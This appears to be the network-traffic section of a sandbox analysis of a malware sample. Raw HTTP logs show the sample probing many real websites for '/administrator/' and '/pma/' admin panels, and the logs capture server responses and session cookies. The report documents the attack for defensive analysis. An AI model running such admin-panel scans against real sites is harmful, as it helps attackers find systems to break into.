74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 54 68 65 20 47 6f 64 68 72 61 20 43 69 74 79 20 43 6f 2d 6f 70 20 42 61 6e 6b 20 4c 74 64 2e 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 63 63 62 2e 63 6f 2e 69 6e 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 54 68 65 20 47 6f 64 68 72 61 20 43 69 74 79 20 43 6f 2d 6f 70 20 42 61 6e 6b 20 4c 74 64 2e 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 63 63 62 2e 63 6f 2e 69 6e 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e
                                                                                                                                                                                                    Data Ascii: 1022<!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0"><link rel="profile" href="//gmpg.org/xfn/11"><title>Page not found &#8211; The Godhra City Co-op Bank Ltd.</title><meta name='robots' content='max-image-preview:large' /><link rel="dns-prefetch" href="//fonts.googleapis.com"><link rel="dns-prefetch" href="//s.w.org"><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="The Godhra City Co-op Bank Ltd. &raquo; Feed" href="https://gccb.co.in/feed/" /><link rel="alternate" type="application/rss+xml" title="The Godhra City Co-op Bank Ltd. &raquo; Comments Feed" href="https://gccb.co.in/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.636558056 CET1340INData Raw: 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73
                                                                                                                                                                                                    Data Ascii: png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/gccb.co.in\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.4.1"}};/*! This file is auto-generated */!function(i,n){var o,
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.636571884 CET1340INData Raw: 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20
                                                                                                                                                                                                    Data Ascii: !1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Ar
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.636584044 CET681INData Raw: 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 65 29 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70
                                                                                                                                                                                                    Data Ascii: (e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.eve
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.636919975 CET1340INData Raw: 31 66 34 30 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67
                                                                                                                                                                                                    Data Ascii: 1f40<style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.636934042 CET1340INData Raw: 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 36 35 29 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75
                                                                                                                                                                                                    Data Ascii: gcaption{color:hsla(0,0%,100%,.65)}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote cite,.wp-block-pullquote footer,.wp-block-pullquote_
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.636946917 CET1340INData Raw: 75 6e 64 3a 6e 6f 74 28 2e 69 73 2d 73 74 79 6c 65 2d 64 6f 74 73 29 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 31 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 2d 62 61 63 6b
                                                                                                                                                                                                    Data Ascii: und:not(.is-style-dots){border-bottom:none;height:1px}.wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){height:2px}.wp-block-table{margin:0 0 1em}.wp-block-table td,.wp-block-table th{word-break:normal}.wp-block-table
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.636960030 CET1340INData Raw: 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70
                                                                                                                                                                                                    Data Ascii: eset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.636970997 CET1340INData Raw: 35 2c 39 38 29 20 38 30 25 2c 72 67 62 28 32 35 34 2c 32 34 38 2c 37 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72
                                                                                                                                                                                                    Data Ascii: 5,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.636981964 CET1340INData Raw: 30 2c 20 30 2c 20 30 2c 20 30 2e 34 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 73 68 61 72 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72
                                                                                                                                                                                                    Data Ascii: 0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-l


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    51192.168.2.455283178.32.41.233806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.850696087 CET298OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: rochester-gauges.be
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://rochester-gauges.be/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.019994974 CET546INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:55:02 GMT
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Content-Length: 315
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    52192.168.2.455306117.20.63.14820306240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.851190090 CET226OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: 117.20.63.148:2030
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.212794065 CET417INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Server: cwpsrv
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 163
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Location: https://117.20.63.148:2031/pma/
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 77 70 73 72 76 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cwpsrv</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    53192.168.2.45538474.220.219.189806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.011717081 CET292OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: himontessori.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://himontessori.com/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.199327946 CET280INHTTP/1.1 409 Conflict
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Content-Length: 83
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                    Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    54192.168.2.455530103.224.212.226806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.199692011 CET229OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: ondania.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.369402885 CET399INHTTP/1.1 302 Found
                                                                                                                                                                                                    date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    server: Apache
                                                                                                                                                                                                    set-cookie: __tad=1700978371.6189521; expires=Wed, 23-Nov-2033 05:59:31 GMT; Max-Age=315360000
                                                                                                                                                                                                    location: http://ww38.ondania.com/administrator/?subid1=20231126-1659-31c6-9eaf-33ea7517d5af
                                                                                                                                                                                                    content-length: 2
                                                                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                                                                    connection: close
                                                                                                                                                                                                    Data Raw: 0a 0a
                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    55192.168.2.45556467.205.16.72806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.214641094 CET230OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: capforge.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.308168888 CET497INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Location: https://capforge.com/administrator/
                                                                                                                                                                                                    Content-Length: 243
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 70 66 6f 72 67 65 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://capforge.com/administrator/">here</a>.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    56192.168.2.455542199.34.228.177806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.235233068 CET244OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: gatewaytoearlylearning.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.497771025 CET1340INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Location: http://www.gatewaytoearlylearning.com/administrator
                                                                                                                                                                                                    Set-Cookie: publishedsite-xsrf=eyJpdiI6ImNhYy9sMktIODNMVHJ4QnNXMWc1MlE9PSIsInZhbHVlIjoiNVBSeW92czRMYjdrM0NlR05ScmZKVTRrUGZ6bFZjZzY0djdyTHZsNXc0Q3RUaTRSTkZvNnltSk5nb1Zib3VPU21NZkJSVXo2UnFQQ0xUbmlTV0U0TE92dnhhVDdocXdwMkdGV21ZSjdLQVRhSmdSS0ZZTTEyakJOVWxsdzU5SFIiLCJtYWMiOiIxYjMwMjc2ZjNlYjFiMTVjYWNiYjNmMTc2OTczMDdkNzg5MDU4YTRiOTlhMzg2OGRhYTUxYzUyYTk1YzJjMTBhIiwidGFnIjoiIn0%3D; expires=Sun, 10-Dec-2023 05:59:31 GMT; Max-Age=1209600; path=/; samesite=lax
                                                                                                                                                                                                    Set-Cookie: XSRF-TOKEN=eyJpdiI6ImZ3cHI5OGJaWWdBaVdpWnVhM2xBU2c9PSIsInZhbHVlIjoiMmM1anNYK3VqaENMOXRoTkJCVUpwSnZKQzNPS2o3NFd1ejUxQXViaENFV2FVWllkOXhmbEM3dlVWOW1uOGNia2VDSlFVOWVseDd5UkFEY2gvZVhUbWo0RCtrSnRmUHl4NEtoUW54MFlPUXhLeEVxMUVWaUhpakFnSUhwbjc0aE0iLCJtYWMiOiJiYTFmNTI0NTVkYmE5MWYyNGI2M2I1OWYwOThmNjAzYmJhZmFmMjQ5M2U0YzNiNTZjOTczNWZlMDdlMGEyNzBjIiwidGFnIjoiIn0%3D; expires=Sun, 10-Dec-2023 05:59:31 GMT; Max-Age=1209600; path=/; samesite=lax
                                                                                                                                                                                                    Set-Cookie: PublishedSiteSession=eyJpdiI6Imc3cnBuWExnUllCRWRFeTdTVnhsMGc9PSIsInZhbHVlIjoib1liWTZEUk1TRnQ2dEhFdW5MeitPWG91VzZkaS9jTjdER0syM2ZGMGExMWw
                                                                                                                                                                                                    Data Raw:
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.497782946 CET136INData Raw: 64 30 74 6a 4c 32 5a 74 53 46 67 35 54 6c 52 4b 64 47 52 48 4b 32 35 33 4d 33 52 70 52 33 5a 48 64 30 35 50 59 33 52 4c 62 55 73 78 4d 45 34 78 56 46 41 78 55 6e 56 61 55 6c 6c 69 61 30 74 49 56 7a 4e 5a 4e 45 74 48 4b 33 68 36 63 32 6f 77 51 32
                                                                                                                                                                                                    Data Ascii: d0tjL2ZtSFg5TlRKdGRHK253M3RpR3ZHd05PY3RLbUsxME4xVFAxUnVaUllia0tIVzNZNEtHK3h6c2owQ2
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.497792959 CET431INData Raw: 77 76 4d 54 6b 78 65 45 68 56 54 54 64 49 64 32 70 51 63 32 4a 6f 4e 47 46 50 65 47 6f 69 4c 43 4a 74 59 57 4d 69 4f 69 4a 6d 59 32 4e 69 4e 7a 49 32 4d 32 4d 33 4e 7a 6b 7a 4e 32 56 6a 5a 57 5a 69 4e 6d 56 68 4d 6a 56 6c 4d 57 45 7a 4e 57 49 35
                                                                                                                                                                                                    Data Ascii: wvMTkxeEhVTTdId2pQc2JoNGFPeGoiLCJtYWMiOiJmY2NiNzI2M2M3NzkzN2VjZWZiNmVhMjVlMWEzNWI5ZjRkMGYxMGZmNTRmMjI5ZWFlZTlmMmZmNzA0MzZiY2VjIiwidGFnIjoiIn0%3D; expires=Sun, 10-Dec-2023 05:59:31 GMT; Max-Age=1209600; path=/; httponly; samesite=laxX-Host: b
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.497803926 CET516INData Raw: 31 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d
                                                                                                                                                                                                    Data Ascii: 1c2<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://www.gatewaytoearlylearning.com/administrator'" /> <title>Redirecting to http://www.gatewaytoearlylearnin
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.839643002 CET1406OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: gatewaytoearlylearning.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PublishedSiteSession=eyJpdiI6Imc3cnBuWExnUllCRWRFeTdTVnhsMGc9PSIsInZhbHVlIjoib1liWTZEUk1TRnQ2dEhFdW5MeitPWG91VzZkaS9jTjdER0syM2ZGMGExMWwvd0tjL2ZtSFg5TlRKdGRHK253M3RpR3ZHd05PY3RLbUsxME4xVFAxUnVaUllia0tIVzNZNEtHK3h6c2owQ2wvMTkxeEhVTTdId2pQc2JoNGFPeGoiLCJtYWMiOiJmY2NiNzI2M2M3NzkzN2VjZWZiNmVhMjVlMWEzNWI5ZjRkMGYxMGZmNTRmMjI5ZWFlZTlmMmZmNzA0MzZiY2VjIiwidGFnIjoiIn0%3D; publishedsite-xsrf=eyJpdiI6ImNhYy9sMktIODNMVHJ4QnNXMWc1MlE9PSIsInZhbHVlIjoiNVBSeW92czRMYjdrM0NlR05ScmZKVTRrUGZ6bFZjZzY0djdyTHZsNXc0Q3RUaTRSTkZvNnltSk5nb1Zib3VPU21NZkJSVXo2UnFQQ0xUbmlTV0U0TE92dnhhVDdocXdwMkdGV21ZSjdLQVRhSmdSS0ZZTTEyakJOVWxsdzU5SFIiLCJtYWMiOiIxYjMwMjc2ZjNlYjFiMTVjYWNiYjNmMTc2OTczMDdkNzg5MDU4YTRiOTlhMzg2OGRhYTUxYzUyYTk1YzJjMTBhIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6ImZ3cHI5OGJaWWdBaVdpWnVhM2xBU2c9PSIsInZhbHVlIjoiMmM1anNYK3VqaENMOXRoTkJCVUpwSnZKQzNPS2o3NFd1ejUxQXViaENFV2FVWllkOXhmbEM3dlVWOW1uOGNia2VDSlFVOWVseDd5UkFEY2gvZVhUbWo0RCtrSnRmUHl4NEtoUW54MFlPUXhLeEVxMUVWaUhpakFnSUhwbjc0aE0iLCJtYWMiOiJiYTFmNTI0NTVkYmE5MWYyNGI2M2I1OWYwOThmNjAzYmJhZmFmMjQ5M2U0YzNiNTZjOTczNWZlMDdlMGEyNzBjIiwidGFnIjoiIn0%3D
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://www.gatewaytoearlylearning.com/administrator


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    57192.168.2.45557066.235.200.147806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.252456903 CET234OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: tradeavenida.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.648561001 CET533INHTTP/1.1 409 Conflict
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    CF-Cache-Status: MISS
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Set-Cookie: _cfuvid=IQ6.fXY1gWOcS0XXP8NWpKFrL_Du5qZaKZaXERo9oLg-1700978371562-0-604800000; path=/; domain=.tradeavenida.com; HttpOnly
